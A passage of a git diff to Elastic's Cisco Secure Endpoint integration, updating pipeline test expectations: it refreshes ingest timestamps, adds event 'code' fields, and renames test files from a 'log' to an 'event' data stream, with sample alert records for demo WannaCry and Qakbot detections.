Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6412604589194871000",
@@ -3882,8 +3929,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139901882Z",
+                "ingested": "2021-09-30T00:15:10.798759114Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419239055241773000",
@@ -3978,8 +4026,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139903619Z",
+                "ingested": "2021-09-30T00:15:10.798761355Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419239055241773000",
@@ -4055,8 +4104,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139905342Z",
+                "ingested": "2021-09-30T00:15:10.798763596Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419239050946806000",
@@ -4126,8 +4176,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139907178Z",
+                "ingested": "2021-09-30T00:15:10.798765999Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229335730782000",
@@ -4201,8 +4252,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139908941Z",
+                "ingested": "2021-09-30T00:15:10.798768257Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229335730782000",
@@ -4288,8 +4340,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139910680Z",
+                "ingested": "2021-09-30T00:15:10.798770474Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4373,8 +4426,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139912392Z",
+                "ingested": "2021-09-30T00:15:10.798772697Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4458,8 +4512,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139914132Z",
+                "ingested": "2021-09-30T00:15:10.798774907Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4543,8 +4598,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139915864Z",
+                "ingested": "2021-09-30T00:15:10.798777126Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4628,8 +4684,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139917583Z",
+                "ingested": "2021-09-30T00:15:10.798779340Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4713,8 +4770,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139919309Z",
+                "ingested": "2021-09-30T00:15:10.798781577Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4798,8 +4856,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139921054Z",
+                "ingested": "2021-09-30T00:15:10.798783833Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4883,8 +4942,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139922777Z",
+                "ingested": "2021-09-30T00:15:10.798786045Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -4968,8 +5028,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139924479Z",
+                "ingested": "2021-09-30T00:15:10.798788263Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229335730782000",
@@ -5041,8 +5102,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139926207Z",
+                "ingested": "2021-09-30T00:15:10.798790467Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419229335730782000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
index a7288b0360c..532974c5229 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
@@ -28,8 +28,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513653513Z",
+                "ingested": "2021-09-30T00:15:28.103711441Z",
